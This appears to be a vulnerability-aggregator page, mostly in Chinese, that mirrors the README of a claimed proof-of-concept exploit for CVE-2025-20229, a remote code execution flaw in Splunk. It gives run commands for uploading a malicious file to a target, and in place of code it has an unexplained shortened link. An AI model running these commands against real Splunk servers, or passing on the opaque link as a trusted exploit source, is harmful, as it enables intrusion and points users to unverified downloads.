CVE-2025-20229 PoC — Splunk Cloud Platform和Splunk Enterprise 访问控制错误漏洞

来源

https://github.com/allinsthon/CVE-2025-20229

关联漏洞

标题:Splunk Cloud Platform和Splunk Enterprise 访问控制错误漏洞 (CVE-2025-20229)
Description:Splunk Cloud Platform和Splunk Enterprise都是美国Splunk公司的产品。Splunk Cloud Platform是一个强大的数据收集、处理和分析服务。Splunk Enterprise是一套数据收集分析软件。 Splunk Cloud Platform和Splunk Enterprise存在访问控制错误漏洞，该漏洞源于低权限用户可能通过文件上传执行远程代码。

介绍

# CVE-2025-20229 Exploit

## Overview
This repository contains an exploit for CVE-2025-20229, a Remote Code Execution (RCE) vulnerability in Splunk Enterprise and Splunk Cloud Platform. The exploit allows a low-privileged user to upload malicious files, enabling arbitrary code execution on the target system.

## Requirements
- Python 3.8+
- Valid authentication token for a low-privileged Splunk account
- Target Splunk instance URL

## Usage
1. Install dependencies:
   ```bash
   pip install -r requirements.txt
   ```
2. Run the exploit script:
   ```bash
   python3 cve-2025-20229.py <target_url> <malicious_file> <auth_token>
   ```
   - `<target_url>`: The Splunk instance URL (e.g., `http://target:8000`)
   - `<malicious_file>`: Path to the malicious file to upload
   - `<auth_token>`: Valid Splunk authentication token

## Example
```bash
python3 cve-2025-20229.py http://target:8000 malicious.sh abc123token
```

## Exploit
[href](https://tinyurl.com/2ct2kp73)

## Disclaimer
This exploit is provided for educational and authorized security testing purposes only. Use on systems without explicit permission is illegal and prohibited. The authors are not responsible for any misuse or damage caused by this tool.

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2025-20229 PoC — Splunk Cloud Platform和Splunk Enterprise 访问控制错误漏洞

来源

关联漏洞

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！